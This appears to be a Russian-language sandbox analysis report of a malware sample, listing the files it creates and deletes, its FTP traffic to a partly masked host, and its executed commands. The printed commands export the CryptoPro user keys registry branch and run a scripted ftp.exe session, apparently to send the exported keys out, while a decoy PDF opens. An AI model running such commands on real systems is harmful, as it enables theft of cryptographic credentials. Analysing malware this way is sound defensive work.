Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\doc.pdf
- %TEMP%\ftpcommands.txt
Удаляет следующие файлы
- %TEMP%\ftpcommands.txt
Сетевая активность
TCP
- 'ft###load.net':21
UDP
- DNS ASK ft###load.net
Другое
Ищет следующие окна
- ClassName: 'RegEdit_RegEdit' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C %WINDIR%\regedit.exe /E %TEMP%\5e6d0532.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Crypto Pro\Settings\Users"' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ftp.exe -s:"%TEMP%\FTPCommands.txt"' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%TEMP%\doc.pdf"
- '%WINDIR%\syswow64\cmd.exe' /C %WINDIR%\regedit.exe /E %TEMP%\5e6d0532.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Crypto Pro\Settings\Users"
- '%WINDIR%\syswow64\regedit.exe' /E %TEMP%\5e6d0532.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Crypto Pro\Settings\Users"
- '%WINDIR%\syswow64\cmd.exe' /c ftp.exe -s:"%TEMP%\FTPCommands.txt"
- '%WINDIR%\syswow64\ftp.exe' -s:"%TEMP%\FTPCommands.txt"
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\ftp.exe"
